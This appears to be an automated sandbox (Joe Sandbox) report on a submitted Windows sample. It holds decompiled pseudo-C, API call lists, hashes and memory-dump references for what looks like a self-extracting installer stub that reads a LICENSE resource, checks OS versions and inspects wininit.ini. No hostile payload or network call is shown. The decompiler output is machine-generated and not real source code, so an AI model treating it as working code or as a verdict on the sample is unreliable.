                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd692b
                                                                                                                                                                                                    0x00fd691c
                                                                                                                                                                                                    0x00fd690a
                                                                                                                                                                                                    0x00fd6885
                                                                                                                                                                                                    0x00fd6876
                                                                                                                                                                                                    0x00fd6951

APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FD686E
• GetSystemMetrics.USER32(0000004A), ref: 00FD68A7
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FD68CC
• RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,?,0000000C), ref: 00FD68F4
• RegCloseKey.ADVAPI32(?), ref: 00FD6902
  • Part of subcall function 00FD66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00FD691A), ref: 00FD6741
Strings
• Control Panel\Desktop\ResourceLocale, xrefs: 00FD68C2
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
• Opcode ID: 4316d5b3574be315a9e14e87f728e00b6d4fec544e2d1238c4c3d8aa33c835bf
• Instruction ID: d0f554052c036d2148477446d0f90e1c7ad158a3ae420e33b052e6b52c705af9
• Opcode Fuzzy Hash: 4316d5b3574be315a9e14e87f728e00b6d4fec544e2d1238c4c3d8aa33c835bf
• Instruction Fuzzy Hash: 26318131E012189FDB21EB61CC14BAAB77AFB45764F0801A7E949E2240DB309D86EF57
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00FD3A3F(void* __eflags) {
    void* _t3;
    void* _t9;
    CHAR* _t16;

    _t16 = "LICENSE";
    _t1 = E00FD468F(_t16, 0, 0) + 1; // 0x1
    _t3 = LocalAlloc(0x40, _t1);
     *0xfd8d4c = _t3;
    if(_t3 != 0) {
        _t19 = _t16;
        if(E00FD468F(_t16, _t3, _t28) != 0) {
            if(lstrcmpA( *0xfd8d4c, "<None>") == 0) {
                LocalFree( *0xfd8d4c);
                L9:
                 *0xfd9124 = 0;
                return 1;
            }
            _t9 = E00FD6517(_t19, 0x7d1, 0, E00FD3100, 0, 0);
            LocalFree( *0xfd8d4c);
            if(_t9 != 0) {
                goto L9;
            }
             *0xfd9124 = 0x800704c7;
            L2:
            return 0;
        }
        E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
        LocalFree( *0xfd8d4c);
         *0xfd9124 = 0x80070714;
        goto L2;
    }
    E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
     *0xfd9124 = E00FD6285();
    goto L2;
}
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F64,?,00000002,00000000), ref: 00FD3A5D
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00FD3AB3
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00FD3AD0
                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00FD3B13
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FindResourceA.KERNEL32(00FD0000,000007D6,00000005), ref: 00FD652A
                                                                                                                                                                                                      • Part of subcall function 00FD6517: LoadResource.KERNEL32(00FD0000,00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FD6538
                                                                                                                                                                                                      • Part of subcall function 00FD6517: DialogBoxIndirectParamA.USER32(00FD0000,00000000,00000547,00FD19E0,00000000), ref: 00FD6557
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FreeResource.KERNEL32(00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FD6560
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00FD3100,00000000,00000000), ref: 00FD3AF4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                     • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                     • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                     • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                    • Opcode ID: af0fdde4034e686e14ef048b53b505c1c78459b075b5ee29415c77dd18b5403a
                                                                                                                                                                                                    • Instruction ID: 53541a262211e2982caf2f4ac30cd6cd9541633e9f12aade762bc1cb1046cd48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af0fdde4034e686e14ef048b53b505c1c78459b075b5ee29415c77dd18b5403a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD11D635702205BBD720AF76AC09F177BBBEBD6750B18402FB642D63E1DA7D8801B625
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD24E0(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t7;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                    				_t7 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					E00FD658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                     			}

                                                                                                                                                                                                    0x00fd24e0
                                                                                                                                                                                                    0x00fd24eb
                                                                                                                                                                                                    0x00fd24f2
                                                                                                                                                                                                    0x00fd24f7
                                                                                                                                                                                                    0x00fd2504
                                                                                                                                                                                                    0x00fd250e
                                                                                                                                                                                                    0x00fd251d
                                                                                                                                                                                                    0x00fd252c
                                                                                                                                                                                                    0x00fd2541
                                                                                                                                                                                                    0x00fd2546
                                                                                                                                                                                                    0x00fd2553
                                                                                                                                                                                                    0x00fd2555
                                                                                                                                                                                                    0x00fd2555
                                                                                                                                                                                                    0x00fd2546
                                                                                                                                                                                                    0x00fd256c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00FD2506
                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00FD252C
                                                                                                                                                                                                    • _lopen.KERNEL32(?,00000040), ref: 00FD253B
                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00FD254C
                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00FD2555
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                     • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                     • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                     • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                    • Opcode ID: 77d3625bdcd33547bc63fb8133dee80de145625d7f59a9bc3448c8c4f6922168
                                                                                                                                                                                                    • Instruction ID: ea69980ee166389cbf04bdfe83f6f4a34a95892a5e538b86c1bdab4fa5b41c6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77d3625bdcd33547bc63fb8133dee80de145625d7f59a9bc3448c8c4f6922168
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801B532A0111867C7209B75DC0CEDF7B7EEB45761F080156FA49D3290DE748E45DAA5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00FD36EE(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                    				signed char _t115;
                                                                                                                                                                                                    				short _t119;
                                                                                                                                                                                                    				CHAR* _t123;
                                                                                                                                                                                                    				CHAR* _t124;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				CHAR* _t138;
                                                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t72 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                    				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    				_t115 = __ecx;
                                                                                                                                                                                                    				_t135 = 0;
                                                                                                                                                                                                    				_v432 = __ecx;
                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                    				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                    					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xfd8184 = 1;
						 *0xfd8180 = 1;
						L13:
						 *0xfd9a40 = _t119;
						L14:
						__eflags =  *0xfd8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00FD2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00FD2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xfd8a38 & 0x00000001;
											if(( *0xfd8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("nst0dum");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00FD681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00FD67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00FD28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0xfd9a40 = _t119;
                                                                                                                                                                                                    						 *0xfd8184 = 1;
                                                                                                                                                                                                    						 *0xfd8180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0xfd9a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0xfd8184 = _t135;
                                                                                                                                                                                                    							 *0xfd8180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E00FD44B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00FD6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

0x00fd36f9
0x00fd3700
0x00fd370c
0x00fd3716
0x00fd3718
0x00fd371b
0x00fd3721
0x00fd372b
0x00fd373d
0x00fd3745
0x00fd3746
0x00fd3746
0x00fd3749
0x00fd37ab
0x00fd37ad
0x00fd37ae
0x00fd37b3
0x00fd37b8
0x00fd37b8
0x00fd37bf
0x00fd37bf
0x00fd37c5
0x00000000
0x00000000
0x00fd37cb
0x00fd37cd
0x00000000
0x00000000
0x00fd37d5
0x00fd37db
0x00fd37e8
0x00fd37ea
0x00fd37ea
0x00fd37ea
0x00fd37f0
0x00fd37f6
0x00fd3805
0x00fd3817
0x00fd382b
0x00fd3830
0x00fd3836
0x00fd383b
0x00fd383d
0x00fd38eb
0x00fd38eb
0x00fd38f2
0x00fd390c
0x00fd3911
0x00fd3911
0x00fd3913
0x00fd394d
0x00fd394d
0x00fd394f
0x00fd38a9
0x00fd38a9
0x00fd38b0
0x00fd38b2
0x00fd38b9
0x00fd38bb
0x00fd38c1
0x00fd3975
0x00fd38c7
0x00fd38de
                                                                                                                                                                                                    0x00fd38e0
                                                                                                                                                                                                    0x00fd38e0
                                                                                                                                                                                                    0x00fd397b
                                                                                                                                                                                                    0x00fd397d
                                                                                                                                                                                                    0x00fd39a9
                                                                                                                                                                                                    0x00fd397f
                                                                                                                                                                                                    0x00fd3982
                                                                                                                                                                                                    0x00fd398b
                                                                                                                                                                                                    0x00fd398d
                                                                                                                                                                                                    0x00fd398f
                                                                                                                                                                                                    0x00fd399f
                                                                                                                                                                                                    0x00fd39a1
                                                                                                                                                                                                    0x00fd3991
                                                                                                                                                                                                    0x00fd3991
                                                                                                                                                                                                    0x00fd3991
                                                                                                                                                                                                    0x00fd398f
                                                                                                                                                                                                    0x00fd39af
                                                                                                                                                                                                    0x00fd39b6
                                                                                                                                                                                                    0x00fd3a0f
                                                                                                                                                                                                    0x00fd3a0f
                                                                                                                                                                                                    0x00fd3a11
                                                                                                                                                                                                    0x00fd3a13
                                                                                                                                                                                                    0x00fd3a19
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39b8
                                                                                                                                                                                                    0x00fd39b8
                                                                                                                                                                                                    0x00fd39ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39bc
                                                                                                                                                                                                    0x00fd39bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39c3
                                                                                                                                                                                                    0x00fd39c9
                                                                                                                                                                                                    0x00fd39ce
                                                                                                                                                                                                    0x00fd39d0
                                                                                                                                                                                                    0x00fd39e3
                                                                                                                                                                                                    0x00fd39e5
                                                                                                                                                                                                    0x00fd39e6
                                                                                                                                                                                                    0x00fd39f1
                                                                                                                                                                                                    0x00fd39f7
                                                                                                                                                                                                    0x00fd39fa
                                                                                                                                                                                                    0x00fd3a01
                                                                                                                                                                                                    0x00fd3a04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3a06
                                                                                                                                                                                                    0x00fd3a09
                                                                                                                                                                                                    0x00fd3a09
                                                                                                                                                                                                    0x00fd3a0b
                                                                                                                                                                                                    0x00fd3a0b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3a09
                                                                                                                                                                                                    0x00fd39fc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39fc
                                                                                                                                                                                                    0x00fd39d3
                                                                                                                                                                                                    0x00fd39d8
                                                                                                                                                                                                    0x00fd39da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39dc
                                                                                                                                                                                                    0x00fd39b6
                                                                                                                                                                                                    0x00fd3955
                                                                                                                                                                                                    0x00fd395b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3961
                                                                                                                                                                                                    0x00fd3963
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3969
                                                                                                                                                                                                    0x00fd3969
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3969
                                                                                                                                                                                                    0x00fd3915
                                                                                                                                                                                                    0x00fd3915
                                                                                                                                                                                                    0x00fd391b
                                                                                                                                                                                                    0x00fd391f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd392d
                                                                                                                                                                                                    0x00fd3933
                                                                                                                                                                                                    0x00fd3938
                                                                                                                                                                                                    0x00fd393a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3940
                                                                                                                                                                                                    0x00fd3946
                                                                                                                                                                                                    0x00fd394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38f2
                                                                                                                                                                                                    0x00fd3843
                                                                                                                                                                                                    0x00fd3845
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd384b
                                                                                                                                                                                                    0x00fd384d
                                                                                                                                                                                                    0x00fd3883
                                                                                                                                                                                                    0x00fd3885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd389a
                                                                                                                                                                                                    0x00fd389e
                                                                                                                                                                                                    0x00fd389e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38a0
                                                                                                                                                                                                    0x00fd38a0
                                                                                                                                                                                                    0x00fd38a2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38a4
                                                                                                                                                                                                    0x00fd384f
                                                                                                                                                                                                    0x00fd3851
                                                                                                                                                                                                    0x00fd3857
                                                                                                                                                                                                    0x00fd386e
                                                                                                                                                                                                    0x00fd3877
                                                                                                                                                                                                    0x00fd387b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3881
                                                                                                                                                                                                    0x00fd3859
                                                                                                                                                                                                    0x00fd385c
                                                                                                                                                                                                    0x00fd3862
                                                                                                                                                                                                    0x00fd3866
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00FD3723
• MessageBeep.USER32(00000000), ref: 00FD39C3
